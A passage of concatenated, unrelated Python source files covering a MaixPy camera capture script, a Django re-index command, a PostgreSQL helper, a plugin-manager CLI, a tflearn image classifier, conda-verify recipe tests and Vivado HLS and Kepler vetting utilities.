".jpg", quality=95) play_sound("/sd/kacha.wav") except: lcd.draw_string(lcd.width()//2-124,lcd.height()//2-4, "Error: Cannot Write to SD Card", lcd.WHITE, lcd.RED) time.sleep(1) else: try: if str(currentDirectory) not in os.listdir("/sd/vaild"): try: os.mkdir("/sd/vaild/" + str(currentDirectory)) except: pass img.save("/sd/vaild/" + str(currentDirectory) + "/" + str(currentImage) + ".jpg", quality=95) play_sound("/sd/kacha.wav") except: lcd.draw_string(lcd.width()//2-124,lcd.height()//2-4, "Error: Cannot Write to SD Card", lcd.WHITE, lcd.RED) time.sleep(1) currentImage = currentImage + 1 isButtonPressedA = 1 if but_a.value() == 1: isButtonPressedA = 0 if but_b.value() == 0 and isButtonPressedB == 0: currentDirectory = currentDirectory + 1 if currentDirectory == 11: currentDirectory = 1 currentImage = max(findMaxIDinDir("/sd/train/" + str(currentDirectory)), findMaxIDinDir("/sd/vaild/" + str(currentDirectory))) + 1 isButtonPressedB = 1 if but_b.value() == 1: isButtonPressedB = 0 # scale sensor image to display size img2 = img.resize(180,135) # LCD: 135*240 #img2.draw_string(0,0,"Train:%03d/35 Class:%02d/10"%(currentImage,currentDirectory),color=(255,255,255),scale=1) img2.draw_string(0,0,"T%02d C%02d"%(currentImage,currentDirectory),color=(0,255 ,0),scale=3) lcd.display(img2) except KeyboardInterrupt: pass print("I'm full of errors"); ##print(some errors will stop the code running) print("some will run but not give the right result") # print("hi mum") a_number = 3 _another = 65 #1_number = 11 #This is a comment line pet1, pet2 = "cat", "dog" #pet3 = pet4 = pet5 = "dog" = "cat" a_string = "Hello World!" print(a_string[-1:-6]) num_string = "10" num_int = int(num_string,2) num_int+=1 print(str(num_int) + " is 11") 0 from django.core.management.base import BaseCommand from django.db import transaction from hexa.catalog.models import Index from hexa.pipelines.models import PipelinesIndex from hexa.plugins.app import get_connector_app_configs class Command(BaseCommand): help = "Re-index all content" def handle(self, *args, **options): self.stdout.write(f"Re-indexing...") self.stdout.write("Deleting existing catalog indexes") Index.objects.all().delete() self.stdout.write("Deleting existing pipelines indexes") PipelinesIndex.objects.all().delete() for app_config in get_connector_app_configs(): app_model_classes = list(app_config.get_models()) indexed_model_classes = [ mc for mc in app_model_classes if hasattr(mc, "index") and callable(getattr(mc, "index")) ] with transaction.atomic(): self.stdout.write(f"Re-indexing content for {app_config.label}") for indexed_model_class in indexed_model_classes: for index_object in indexed_model_class.objects.all(): self.stdout.write(f"Re-indexing {index_object}") index_object.save() self.stdout.write(self.style.SUCCESS("Done")) from pathlib import Path from pathlib import PurePath def get_clock_path(): current_path = Path.cwd() # FIXME: hardcode for linux file system local_html = 'file://' + str(PurePath(current_path,'index.html')) web_url = 'https://jonathancychow.github.io/countdown/' # FIXME: hardcode for reading local html url = local_html return url def substitute_dict(d, replacement): return dict( (k, ((d[k] in replacement) and replacement[d[k]] or d[k])) for k in d ) x = { "foo": "bar", "bum": "butt" } y = { "butt": "poo" } print substitute_dict(x, y) Storj/metadisk-client-python import unittest from pymdc.rest import REST class TestRest(unittest.TestCase): def test_rest(self): self.assertTrue(type(REST("GET", "/")) == dict) jakubarendac/fingerflow from ..MinutiaeNet.FineNet import fine_net_model from .. import constants def get_classify_net_model(pretrained_path, num_classes=constants.MINUTIAE_CLASSES): return fine_net_model.get_fine_net_model( num_classes, pretrained_path, constants.INPUT_SHAPE, "ClassifyNet", "classification_layer") python/ql/test/query-tests/Security/CWE-215/settings.py ALWAYS_TRUE = True import psycopg2 import os from dotenv import load_dotenv load_dotenv() class DataBaseBehavior: @staticmethod def create_connection(): try: return psycopg2.connect( f"dbname='{os.environ.get('POSTGRES_DB')}'" f"user='{os.environ.get('POSTGRES_USER')}' " f"host='{os.environ.get('POSTGRES_HOST')}' " f"password='{('POSTGRES_PASSWORD')}'" ) except (Exception, psycopg2.DatabaseError) as error: print(error) except (Exception, psycopg2.OperationalError) as error: print(error) @staticmethod def destroy_connection(connection): if connection is not None: connection.commit() connection.close() @staticmethod def execute_sql(cursor, query, values=None): records = None try: if 'INSERT' in query: cursor.execute(query, values) else: cursor.execute(query) except (Exception, psycopg2.Error) as error: print(error) finally: if cursor is not None: cursor.close() return records class DataBaseManager(DataBaseBehavior): def create_table(self, query): conn = self.create_connection() cursor = conn.cursor() self.execute_sql(cursor, query) self.destroy_connection(conn) def drop_table(self, table_name): query = f"DROP TABLE {table_name}" conn = self.create_connection() cursor = conn.cursor() self.execute_sql(cursor, query) self.destroy_connection(conn) def insert_data_into_crash_canvas_history(self, values: tuple): query = f"INSERT INTO crash_canvas_history (uuid, rate, date_hour) VALUES (%s,%s,%s)" conn = self.create_connection() cursor = conn.cursor() self.execute_sql(cursor, query, values) self.destroy_connection(conn) """ This module implements a simple command line tool that wraps the REST management interface of son-plugin-manager. """ import argparse import requests import json def plugin_list(endpoint): r = requests.get("%s/api/plugins" % endpoint) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_info(uuid, endpoint): r = requests.get("%s/api/plugins/%s" % (endpoint, uuid)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_remove(uuid, endpoint): r = requests.delete("%s/api/plugins/%s" % (endpoint, uuid)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_lifecycle_start(uuid, endpoint): req = {"target_state": "start"} r = requests.put("%s/api/plugins/%s/lifecycle" % (endpoint, uuid), json=json.dumps(req)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_lifecycle_pause(uuid, endpoint): req = {"target_state": "pause"} r = requests.put("%s/api/plugins/%s/lifecycle" % (endpoint, uuid), json=json.dumps(req)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_lifecycle_stop(uuid, endpoint): req = {"target_state": "stop"} r = requests.put("%s/api/plugins/%s/lifecycle" % (endpoint, uuid), json=json.dumps(req)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def _argument_missing(arg="UUID"): print("Error: Missing argument %r." % arg) print("Run with --help to get more info.") print("Abort.") exit(0) def _request_failed(code): print("Request failed with code %r." % code) print("Abort.") exit(0) parser = argparse.ArgumentParser(description='son-pm-cli') parser.add_argument( "command", choices=['list', 'info', 'remove', 'lifecycle-start', 'lifecycle-pause', 'lifecycle-stop'], help="Action to be executed.") parser.add_argument( "--uuid", "-u", dest="uuid", help="UUID of the plugin to be manipulated.") parser.add_argument( "--endpoint", "-e", dest="endpoint", default="http://127.0.0.1:8001", help="UUID of the plugin to be manipulated.") def main(): args = vars(parser.parse_args()) # basic input checks if args.get("command") != "list" and args.get("uuid") is None: _argument_missing() # call command functions (yeah, static mapping is not nice, I know) if args.get("command") == "list": plugin_list(args.get("endpoint")) elif args.get("command") == "info": plugin_info(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "remove": plugin_remove(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "lifecycle-start": plugin_lifecycle_start(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "lifecycle-pause": plugin_lifecycle_pause(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "lifecycle-stop": plugin_lifecycle_stop(args.get("uuid"), args.get("endpoint")) if __name__ == '__main__': main() # Created by sihan at 2018-10-30 import os import matplotlib.pyplot as plt import numpy as np import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' IMG_SIZE = 64 LR = 1e-4 MODEL_NAME = 'dogsVScats-{}-{}-{}.model'.format(LR, IMG_SIZE, '2conv-basic') tf.reset_default_graph() convnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 1], name='input') convnet = conv_2d(convnet, 32, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 64, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 128, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 64, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 32, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = fully_connected(convnet, 1024, activation='relu') convnet = dropout(convnet, 0.8) convnet = fully_connected(convnet, 2, activation='softmax') convnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets') model = tflearn.DNN(convnet, tensorboard_dir='log') model.load(r'./checkPoint_2conv/' + MODEL_NAME) print('model loaded!') test_data = np.load('./data/test_data_proc_'+str(IMG_SIZE)+'_12500.npy') fig = plt.figure() for num, data in enumerate(test_data[:20]): # cat: [1,0] # dog: [0,1] img_num = data[1] img_data = data[0] y = fig.add_subplot(5, 4, num + 1) orig = img_data data = img_data.reshape(IMG_SIZE, IMG_SIZE, 1) model_out = model.predict([data])[0] if np.argmax(model_out) == 1: str_label = 'Dog' else: str_label = 'Cat' y.imshow(orig, cmap='gray') plt.title(str_label) y.axes.get_xaxis().set_visible(False) y.axes.get_yaxis().set_visible(False) plt.show() # now = str(time.time()) # plt.savefig(r'..\..\resources\\' + MODEL_NAME + "_" + now+".png") import os import pytest from conda_verify import utilities from conda_verify.verify import Verify from conda_verify.errors import RecipeError @pytest.fixture def recipe_dir(): return os.path.join(os.path.dirname(__file__), 'test_recipes') def test_invalid_package_field(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_field') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2109] Found invalid section "extra_field"' in error def test_invalid_package_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "extra" in section "package"' in error def test_invalid_source_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_source_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "sha3" in section "source"' in error def test_invalid_multiple_source_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_multiple_sources') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "gti_url" in section "source"' in error def test_invalid_build_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "yesarch" in section "build"' in error def test_invalid_requirements_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_requirements_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "extra_field" in section "requirements"' in error def test_invalid_test_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_test_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "no_files" in section "test"' in error def test_invalid_about_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_about_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "something_extra" in section "about"' in error def test_invalid_app_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_app_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "noentry" in section "app"' in error def test_invalid_package_name(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2102] Found invalid package name "some_package." in meta.yaml' in error def test_invalid_package_sequence(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_sequence') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2103] Found invalid sequence "_-" in package name' in error def test_no_package_version(recipe_dir): recipe = os.path.join(recipe_dir, 'no_package_version') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2104] Missing package version in meta.yaml' in error def test_invalid_package_version(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_version') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2105] Found invalid package version "1.0.0rc3!" in meta.yaml' in error def test_invalid_package_version_prefix(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_version_prefix') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2105] Found invalid package version "_1.0.0rc3" in meta.yaml' in error def test_invalid_package_version_sequence(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_version_sequence') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2106] Found invalid sequence "._" in package version' in error def test_invalid_build_number(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_number') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2107] Build number in info/index.json must be an integer' in error def test_invalid_build_number_negative(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_number_negative') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2108] Build number in info/index.json cannot be a negative integer' in error def test_invalid_source_url(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_source_url') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2120] Found invalid URL "www.continuum.io" in meta.yaml' in error def test_invalid_about_summary(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_about_summary') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2117] Found summary with length greater than 80 characters' in error def test_invalid_about_url(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_about_url') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2118] Found invalid URL "www.continuum.io" in meta.yaml' in error def test_invalid_source_hash(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_source_hash') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2119] Found invalid hash "abc123" in meta.yaml' in error def test_invalid_license_family(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_license_family') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2122] Found invalid license family "The Extra License"' in error def test_invalid_test_files(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_test_files') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2124] Found file "test-data.txt" in meta.yaml that doesn\'t exist' in error def test_invalid_test_file_path(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_test_file_path') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2123] Found file "../test-data.txt" listed outside recipe directory' in error def test_invalid_dir_content(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_dir_content') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert any('[C2125] Found disallowed file with extension' in e for e in error) assert any('testfile.tar' in e for e in error) def test_invalid_dir_content_filesize(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_dir_content_filesize') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert any('[C2125] Found disallowed file with extension' in e for e in error) assert any('test.tar.bz2' in e for e in error) def test_duplicate_version_specifications(recipe_dir): recipe = os.path.join(recipe_dir, 'duplicate_version_specs') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert "[C2116] Found duplicate run requirements: ['python', 'python']" in error def test_conda_forge_example_recipe(recipe_dir): recipe = os.path.join(recipe_dir, 'conda_forge') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2126] Found conda-forge comment in meta.yaml file' in error def test_invalid_outputs(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_output') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "srcitp" in section "outputs"' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid sources at runtime') def test_invalid_sources(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_sources') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2121] Found both git_branch and git_tag in meta.yaml source field' in error def test_duplicate_build_requirements(recipe_dir): recipe = os.path.join(recipe_dir, 'duplicate_build_requirements') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert ("[C2115] Found duplicate build requirements: ['python', 'python']" in error or "[C2115] Found duplicate build requirements: ['python 3.6.*', 'python 3.6.*']" in error) @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid characters at runtime') def test_invalid_build_requirement_name(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_requirement_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2111] Found invalid build requirement "python!"' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid requirement versions at runtime') def test_invalid_build_requirement_version(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_requirement_version') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2114] Found invalid dependency "setuptools >= 3.4 < 3045" in meta.yaml' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid characters at runtime') def test_invalid_run_requirement_name(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_run_requirement_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2112] Found invalid run requirement "python@#"' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles missing package names at runtime') def test_no_package_name(recipe_dir): recipe = os.path.join(recipe_dir, 'no_package_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2101] Missing package name in meta.yaml' in error import re import os import defusedxml.ElementTree as ET from . import Backend from .. import Port, IOType, ValueType from ..exception import NoHLSProjectError, InvalidHLSProjectError from ..exception import NoSpecifiedHLSProjectError, ManyHLSProjectsError class VivadoBackend(Backend): """A Backend subclass representing the Vivado HLS backend.""" def process_solutions(self, path: str, hls_project_name: str) -> (str, list): project_path = None if hls_project_name is None: for root, directories, files in os.walk(path): for f in files: if f == 'vivado_hls.app': if project_path is None: project_path = root else: raise ManyHLSProjectsError if project_path is None: raise NoHLSProjectError else: project_path = os.path.join(path, hls_project_name) if not os.path.exists(project_path) or \ 'vivado_hls.app' not in os.listdir(project_path): raise NoSpecifiedHLSProjectError solutions_to_return = [] try: hls_config_tree = ET.parse(os.path.join(project_path, 'vivado_hls.app')) root = hls_config_tree.getroot() solutions = None for child in root: if child.tag.endswith('solutions'): solutions = child break if solutions is None: raise RuntimeError( 'Could not find the "solutions" tag in vivado_hls.app') for solution in solutions: name = solution.get('name') if name is not None: solutions_to_return.append(name) except Exception as ex: raise InvalidHLSProjectError(exception=ex) return project_path, solutions_to_return def get_hdl_dir_path(self, proj_path: str, solution: str) -> str: return os.path.join(proj_path, solution, 'impl', 'ip', 'hdl') def get_ip_hdl_file_path(self, proj_path: str, solution: str) -> str: return os.path.join(self.get_hdl_dir_path(proj_path, solution), 'vhdl', 'myproject.vhd') def parse_ports(self, hdl_str: str) -> list: regex = re.compile( r'entity\s+myproject\s+is\s+port\s*\((.*)\)\s*;\s*end\s*;', flags=re.DOTALL|re.IGNORECASE) res = regex.search(hdl_str) port_lines = map(str.strip, res.group(1).split('\n')) ports = [] line_regex = re.compile(r'(\S+)\s*:\s+(in|out)\s+([^;]+);?', flags=re.IGNORECASE) for line in port_lines: line_res = line_regex.search(line) if line_res is None: continue ports.append(Port(line_res.group(1), IOType.INPUT if line_res.group(2).lower() == 'in' else IOType.OUTPUT, ValueType.convert(line_res.group(3)))) return ports def parse_num_inputs(self, ports: list, hdl_str: str) -> int: const_size_in_name = None for port in ports: if port.name.startswith('const_size_in'): const_size_in_name = port.name break if const_size_in_name is None: return None regex = re.compile(const_size_in_name + r'\s+<=\s+(\S+)\s*;', flags=re.IGNORECASE) res = regex.search(hdl_str) if res is None: return None const_name = res.group(1) regex = re.compile( r'constant\s+' + const_name + r'\s*:\s+std_logic_vector.+:=\s*"([01]+)"\s*;', flags=re.IGNORECASE) res = regex.search(hdl_str) if res is None: return None return int(res.group(1), 2) # -*- coding: utf-8 -*- """ Created on Fri Jan 29 09:55:11 2016 @author: sthomp A multi plot creator to create Vetting type documents for our detected signals. This code is depricated, see pipeline.multiPagePlot """ from matplotlib.backends.backend_pdf import PdfPages import matplotlib.pyplot as plt import dave.pipeline.plotting as pp import dave.diffimg.plot as dip def plot_all_multipages(outfile,clip,intext): """Take a clipboard, clip, and create plots put these plots all into one multi paged document specifieed by outfile """ dotperinch=300 figuresize=(10,8) # The PDF document pdf_pages = PdfPages(outfile) # Create a figure instance (ie. a new page) #pdf_pages.attach_note(('KIC %u [%u]' % (clip.value, clip.disposition.isCandidate)),positionRect=[100,200,10,400]) fig = plt.figure(figsize=figuresize, dpi=dotperinch) plt.figtext(0.5,0.5,intext,color='r',fontsize=15) fig.patch.set_visible(False) plt.gca().axis('off') pdf_pages.savefig(fig) plt.close() fig = plt.figure(figsize=figuresize, dpi=dotperinch) # Plot whatever you wish to plot pp.summaryPlot1(clip) # Done with the page pdf_pages.savefig(fig) plt.close() fig = plt.figure(figsize=figuresize, dpi=dotperinch) pp.indivTransitPlot(clip,7) pdf_pages.savefig(fig) plt.close() try: fig = plt.figure(figsize=figuresize, dpi=dotperinch) pp.blsPlot(clip) pdf_pages.savefig(fig) plt.close() except AttributeError: pass try: fig = plt.figure(figsize=figuresize, dpi=dotperinch) plt.figtext(0.2,0.35,clip.disposition,color='b',fontsize=14) plt.title('Disposition Information in Clipboard') pdf_pages.savefig(fig) plt.close() except: pass try: #Plot centroid plots (fig1,fig2)=dip.plotWrapper(clip) except: fig1=plt.plot() fig2=plt.plot() pdf_pages.savefig(fig2) pdf_pages.savefig(fig1) plt.close() plt.close() # Write the PDF document to the disk pdf_pages.close() plt.close() #%% def createExportString(clip, delimiter=" ", badValue="nan"): """Create a line of text for the exporter Inputs: ------------ clip A clipboard object Optional Inputs: ----------------- delimiter: (string) The character, or set of characters to separate elements badValue (string) String to be output when a value isn't present Returns: ----------- Two strings. The first is the text to be exported. The second is the list of keys that were exported """ keysForExport = ( ('value' , '%10i'), \ ('trapFit.period_days', '%7.3f'), \ ('trapFit.epoch_bkjd', '%12.6f'), \ ('trapFit.duration_hrs', '%7.3f'), \ ('trapFit.snr', '%6.2f'), \ ('disposition.isSignificantEvent', '%1i'), \ ('disposition.isCandidate', '%i'), \ ('disposition.reasonForFail', '%s'), \ ) hdr = [] text = [] for tup in keysForExport: key, fmt = tup hdr.append(key) try: text.append( fmt % (clip[key])) except KeyError: text.append(badValue) text = delimiter.join(text) hdr = delimiter.join(hdr) return text, hdr bopopescu/conpaas-1 # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import mimetypes from libcloud.utils.py3 import PY3 from libcloud.utils.py3 import httplib from libcloud.utils.py3 import next from libcloud.utils.py3 import b CHUNK_SIZE = 8096 if PY3: from io import FileIO as file def read_in_chunks(iterator, chunk_size=None, fill_size=False): """ Return a generator which yields data in chunks. @type iterator: C{Iterator} @param response: An object which implements an iterator interface or a File like object with read method. @type chunk_size: C{int} @param chunk_size: Optional chunk size (defaults to 